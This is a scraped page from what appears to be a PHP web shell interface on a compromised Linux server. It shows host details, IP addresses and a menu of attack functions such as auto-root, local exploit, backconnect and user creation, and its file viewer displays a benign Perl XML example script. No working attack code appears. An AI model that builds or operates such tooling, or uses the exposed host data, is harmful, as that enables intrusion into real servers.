Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libxml-grove-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
README
947
B
-rw-r--r--
grove.pl
1.43
KB
-rw-r--r--
my-html.html
957
B
-rw-r--r--
my-html.pl
2.16
KB
-rw-r--r--
test-ids.pl
739
B
-rw-r--r--
test-path.pl
837
B
-rw-r--r--
test-sub.pl
660
B
-rw-r--r--
visitor.pl
1.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : grove.pl
# # Copyright (C) 1998 Ken MacLeod # See the file COPYING for distribution terms. # # $Id: grove.pl,v 1.4 1999/05/06 23:13:02 kmacleod Exp $ # use XML::Parser::PerlSAX; use XML::Grove; use XML::Grove::Builder; my $builder = XML::Grove::Builder->new; my $parser = XML::Parser::PerlSAX->new(Handler => $builder); my $doc; foreach $doc (@ARGV) { my $grove = $parser->parse (Source => { SystemId => $doc }); dump_grove ($grove); } sub dump_grove { my $grove = shift; my @context = (); _dump_contents ($grove->{Contents}, \@context); } sub _dump_contents { my $contents = shift; my $context = shift; foreach $item (@$contents) { if (ref ($item) =~ /::Element/) { push @$context, $item->{Name}; my @attributes = %{$item->{Attributes}}; print STDERR "@$context \\\\ (@attributes)\n"; _dump_contents ($item->{Contents}, $context); print STDERR "@$context //\n"; pop @$context; } elsif (ref ($item) =~ /::PI/) { my $target = $item->{Target}; my $data = $item->{Data}; print STDERR "@$context ?? $target($data)\n"; } elsif (ref ($item) =~ /::Characters/) { my $data = $item->{Data}; $data =~ s/([\x80-\xff])/sprintf "#x%X;", ord $1/eg; $data =~ s/([\t\n])/sprintf "#%d;", ord $1/eg; print STDERR "@$context || $data\n"; } elsif (!ref ($item)) { print STDERR "@$context !! SCALAR: $item\n"; } else { print STDERR "@$context !! OTHER: $item\n"; } } }
Close